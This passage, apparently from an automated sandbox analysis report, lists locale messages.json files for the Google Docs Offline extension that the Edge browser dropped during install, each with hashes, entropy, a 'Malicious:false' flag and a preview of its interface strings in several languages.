                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\nl\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):914
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                                  MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                                  SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                                  SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                                  SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\nn\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):851
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                  MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                  SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                  SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                  SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\no\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):878
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                                  MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                                  SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                                  SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                                  SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\pa\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2766
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                                  MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                                  SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                                  SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                                  SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\pl\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):978
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                                  MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                                  SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                                  SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                                  SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):907
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                                  MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                                  SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                                  SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                                  SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\pt_PT\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):914
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                                  MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                                  SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                                  SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                                  SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\ro\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):937
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                                  MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                                  SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                                  SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                                  SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\ru\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1337
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                                  MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                                  SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                                  SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                                  SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\si\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2846
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                                  MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                                  SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                                  SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                                  SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\sk\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):934
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                                                  MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                                                  SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                                                  SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                                                  SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\sl\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):963
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                                                  MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                                                  SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                                                  SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                                                  SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\sr\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1320
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                                                  MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                                                  SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                                                  SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                                                  SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
